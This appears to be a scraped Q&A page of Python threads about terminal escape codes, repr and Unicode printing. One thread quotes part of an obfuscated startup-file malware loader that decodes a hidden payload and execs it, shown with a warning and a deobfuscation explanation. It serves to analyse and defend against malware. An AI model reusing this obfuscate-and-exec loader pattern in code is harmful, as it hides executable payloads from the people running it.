Attempting to debug hex instruction, but python clears my console? - python

I'm writing a driver and am concatenating some hex instructions based on a few conditionals. Up until this point, all instructions have worked as intended.
A new instruction I was working on isn't working as intended, so I attempted to print out the instruction after concatenation and before execution to see what was wrong.
msg = '\xc2%s%s' % ('\x1b\x63', '07')
assert self.dev.ctrl_transfer(0x21, 9, 0x0300, 0, msg) == len(msg)
print(msg)
When I print it after concatenation it clears the console and prints '07' and then continues the rest of the driver execution. I'm able to print and execute every other instruction I've concatenated, such as the following, without issue.
msg = '\xc2%s%s' % ('\x1b\x72, '07')
Does anyone have an idea why this is happening? Does the '\x63' byte tell python to do something I'm unaware of? It should just be concatenated to the rest of the instruction, followed by the '\x07' byte. Note, that if I include the '\x' before the '07' (unlike my code above) it still does the same thing, it just doesn't print '07', it leaves a blank line.
Thanks!

The character '\x63' is the same character as 'c' (and a half-dozen other ways to spell it). The letter c doesn't mean anything special to Python.
The character '\x1b' right before the c is Escape. That doesn't mean anything special to Python either—but it probably does to your terminal. Most terminals use "escape sequences" that start with Escape and end with a letter to do things like scroll up, changing the main text color, or clear the screen.
If this is getting in the way of an interactive debugging session, you may want to consider printing the repr of the string rather than the string itself. The easiest way to do that is to not even use print:
>>> msg = b'\x1b\x63'
>>> msg
b'\x1bc'
>>> print(repr(msg))
b'\x1bc'
Notice that either way, it includes the b and the quotes—and that it hex-escapes all non-printable bytes. And it works basically the same with Unicode strings instead of byte string:
>>> msg = '\x1b\x63'
>>> msg
'\x1bc'
>>> print(repr(msg))
'\x1bc'
If you're using Python 2.x, you'll have u prefixes instead of none on the Unicode ones, and no prefixes instead of b on the bytes, but basically the same.

Related

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file was added into my startup files.
Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.
Can someone either guide me through how I can do that, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
for x in r:
if x == "ζ":
print()
else:
x = chr(ord(x)-683867)
if x in decode:
x = decode[(decode.index(x) + 1) % len(decode)]
print(x, end='')
Each sequence of hex digits between the / is a line. Each two hex digits in the line is treated as a byte and interpreted as UTF-8. The resulting UTF-8 character is then converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

convert Unicode to normal string [duplicate]

When I parse this XML with p = xml.parsers.expat.ParserCreate():
<name>Fortuna Düsseldorf</name>
The character parsing event handler includes u'\xfc'.
How can u'\xfc' be turned into u'ü'?
This is the main question in this post, the rest just shows further (ranting) thoughts about it
Isn't Python unicode broken since u'\xfc' shall yield u'ü' and nothing else?
u'\xfc' is already a unicode string, so converting it to unicode again doesn't work!
Converting it to ASCII as well doesn't work.
The only thing that I found works is: (This cannot be intended, right?)
exec( 'print u\'' + 'Fortuna D\xfcsseldorf'.decode('8859') + u'\'')
Replacing 8859 with utf-8 fails! What is the point of that?
Also what is the point of the Python unicode HOWTO? - it only gives examples of fails instead of showing how to do the conversions one (especially the houndreds of ppl who ask similar questions here) actually use in real world practice.
Unicode is no magic - why do so many ppl here have issues?
The underlying problem of unicode conversion is dirt simple:
One bidirectional lookup table '\xFC' <-> u'ü'
unicode( 'Fortuna D\xfcsseldorf' )
What is the reason why the creators of Python think it is better to show an error instead of simply producing this: u'Fortuna Düsseldorf'?
Also why did they made it not reversible?:
>>> u'Fortuna Düsseldorf'.encode('utf-8')
'Fortuna D\xc3\xbcsseldorf'
>>> unicode('Fortuna D\xc3\xbcsseldorf','utf-8')
u'Fortuna D\xfcsseldorf'
You already have the value. Python simply tries to make debugging easier by giving you a representation that is ASCII friendly. Echoing values in the interpreter gives you the result of calling repr() on the result.
In other words, you are confusing the representation of the value with the value itself. The representation is designed to be safely copied and pasted around, without worry about how other systems might handle non-ASCII codepoints. As such the Python string literal syntax is used, with any non-printable and non-ASCII characters replaced by \xhh and \uhhhh escape sequences. Pasting those strings back into a Python string or interactive Python session will reproduce the exact same value.
As such ü has been replaced by \xfc, because that's the Unicode codepoint for the U+00FC LATIN SMALL LETTER U WITH DIAERESIS codepoint.
If your terminal is configured correctly, you can just use print and Python will encode the Unicode value to your terminal codec, resulting in your terminal display giving you the non-ASCII glyphs:
>>> u'Fortuna Düsseldorf'
u'Fortuna D\xfcsseldorf'
>>> print u'Fortuna Düsseldorf'
Fortuna Düsseldorf
If your terminal is configured for UTF-8, you can also write the UTF-8 bytes directly to your terminal, after encoding explicitly:
>>> u'Fortuna Düsseldorf'.encode('utf8')
'Fortuna D\xc3\xbcsseldorf'
>>> print u'Fortuna Düsseldorf'.encode('utf8')
Fortuna Düsseldorf
The alternative is for you upgrade to Python 3; there repr() only uses escape sequences for codepoints that have no printable glyphs (control codes, reserved codepoints, surrogates, etc; if the codepoint is not a space but falls in a C* or Z* general category, it is escaped). The new ascii() function gives you the Python 2 repr() behaviour still.

Python - Reading Emoji Unicode Characters

I have a Python 2.7 program which reads iOS text messages from a SQLite database. The text messages are unicode strings. In the following text message:
u'that\u2019s \U0001f63b'
The apostrophe is represented by \u2019, but the emoji is represented by \U0001f63b. I looked up the code point for the emoji in question, and it's \uf63b. I'm not sure where the 0001 is coming from. I know comically little about character encodings.
When I print the text, character by character, using:
s = u'that\u2019s \U0001f63b'
for c in s:
print c.encode('unicode_escape')
The program produces the following output:
t
h
a
t
\u2019
s
\ud83d
\ude3b
How can I correctly read these last characters in Python? Am I using encode correctly here? Should I just attempt to trash those 0001s before reading it, or is there an easier, less silly way?
I don't think you're using encode correctly, nor do you need to. What you have is a valid unicode string with one 4 digit and one 8 digit escape sequence. Try this in the REPL on, say, OS X
>>> s = u'that\u2019s \U0001f63b'
>>> print s
that’s 😻
In python3, though -
Python 3.4.3 (default, Jul 7 2015, 15:40:07)
>>> s = u'that\u2019s \U0001f63b'
>>> s[-1]
'😻'
Your last part of confusion is likely due to the fact that you are running what is called a "narrow Python build". Python can't hold a single character with enough information to hold a single emoji. The best solution would be to move to Python 3. Otherwise, try to process the UTF-16 surrogate pair.

Python Character Encoding

I have a python script that retrieves information from a web service and then looks up data in a MySQL db. The data is unicode when I receive it, however I want the SQL statement to use the actual character (Băcioi in the example below). As you can see, when I try and encode it to utf-8 the result is still not what I'm looking for.
>>> x = u'B\u0103cioi'
>>> x
u'B\u0103cioi'
>>> x.encode('utf-8')
'B\xc4\x83cioi'
>>> print x
Băcioi ## << What I want!
Your encoding is working fine. Python is simply showing you the repr()'d version of it on the command line, which uses \x escapes. You can tell because of the fact that it's also displaying the quotes around the string.
print does not do any mutation of the string - if it prints out the character you want, that's what is actually in the contents of the string.

How to print tuples of unicode strings in original language (not u'foo' form)

I have a list of tuples of unicode objects:
>>> t = [('亀',), ('犬',)]
Printing this out, I get:
>>> print t
[('\xe4\xba\x80',), ('\xe7\x8a\xac',)]
which I guess is a list of the utf-8 byte-code representation of those strings?
but what I want to see printed out is, surprise:
[('亀',), ('犬',)]
but I'm having an inordinate amount of trouble getting the bytecode back into a human-readable form.
but what I want to see printed out is, surprise:
[('亀',), ('犬',)]
What do you want to see it printed out on? Because if it's the console, it's not at all guaranteed your console can display those characters. This is why Python's ‘repr()’ representation of objects goes for the safe option of \-escapes, which you will always be able to see on-screen and type in easily.
As a prerequisite you should be using Unicode strings (u''). And, as mentioned by Matthew, if you want to be able to write u'亀' directly in source you need to make sure Python can read the file's encoding. For occasional use of non-ASCII characters it is best to stick with the escaped version u'\u4e80', but when you have a lot of East Asian text you want to be able to read, “# coding=utf-8” is definitely the way to go.
print '[%s]' % ', '.join([', '.join('(%s,)' % ', '.join(ti) for ti in t)])
That would print the characters unwrapped by quotes. Really you'd want:
def reprunicode(u):
return repr(u).decode('raw_unicode_escape')
print u'[%s]' % u', '.join([u'(%s,)' % reprunicode(ti[0]) for ti in t])
This would work, but if the console didn't support Unicode (and this is especially troublesome on Windows), you'll get a big old UnicodeError.
In any case, this rarely matters because the repr() of an object, which is what you're seeing here, doesn't usually make it to the public user interface of an application; it's really for the coder only.
However, you'll be pleased to know that Python 3.0 behaves exactly as you want:
plain '' strings without the ‘u’ prefix are now Unicode strings
repr() shows most Unicode characters verbatim
Unicode in the Windows console is better supported (you can still get UnicodeError on Unix if your environment isn't UTF-8)
Python 3.0 is a little bit new and not so well-supported by libraries, but it might well suit your needs better.
First, there's a slight misunderstanding in your post. If you define a list like this:
>>> t = [('亀',), ('犬',)]
...those are not unicodes you define, but strs. If you want to have unicode types, you have to add a u before the character:
>>> t = [(u'亀',), (u'犬',)]
But let's assume you actually want strs, not unicodes. The main problem is, __str__ method of a list (or a tuple) is practically equal to its __repr__ method (which returns a string that, when evaluated, would create exactly the same object). Because __repr__ method should be encoding-independent, strings are represented in the safest mode possible, i.e. each character outside of ASCII range is represented as a hex character (\xe4, for example).
Unfortunately, as far as I know, there's no library method for printing a list that is locale-aware. You could use an almost-general-purpose function like this:
def collection_str(collection):
if isinstance(collection, list):
brackets = '[%s]'
single_add = ''
elif isinstance(collection, tuple):
brackets = '(%s)'
single_add =','
else:
return str(collection)
items = ', '.join([collection_str(x) for x in collection])
if len(collection) == 1:
items += single_add
return brackets % items
>>> print collection_str(t)
[('亀',), ('犬',)]
Note that this won't work for all possible collections (sets and dictionaries, for example), but it's easy to extend it to handle those.
Python source code files are strictly ASCII, so you must use the \u escape sequences unless you specify an encoding. See PEP 0263.
#!/usr/bin/python
# coding=utf-8
t = [u'亀', u'犬']
print t
When you pass an array to print, Python converts the object into a string using Python's rules for string conversions. The output of such conversions are designed for eval(), which is why you see those \u sequences. Here's a hack to get around that based on bobince's solution. The console must accept Unicode or this will throw an exception.
t = [(u'亀',), (u'犬',)]
print repr(t).decode('raw_unicode_escape')
So this appears to do what I want:
print '[%s]' % ', '.join([', '.join('(%s,)' % ', '.join(ti) for ti in t)])
>>> t = [('亀',), ('犬',)]
>>> print t
[('\xe4\xba\x80',), ('\xe7\x8a\xac',)]
>>> print '[%s]' % ', '.join([', '.join('(%s,)' % ', '.join(ti) for ti in t)])
[(亀,), (犬,)]
Surely there's a better way to do it.
(but other two answers thus far don't result in the original string being printed out as desired).
Try:
import codecs, sys
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
It seems people are missing what people want here. When I print unicode from a tuple, I just want to get rid of the 'u' '[' '(' and quotes. What we want is a function like below.
After scouring the Net it seems to be the cleanest way to get atomic displayable data.
If the data is not in a tuple or list, I don't think this problem exists.
def Plain(self, U_String) :
P_String = str(U_String)
m=re.search("^\(\u?\'(.*)\'\,\)$", P_String)
if (m) : #Typical unicode
P_String = m.group(1).decode("utf8")
return P_String

Categories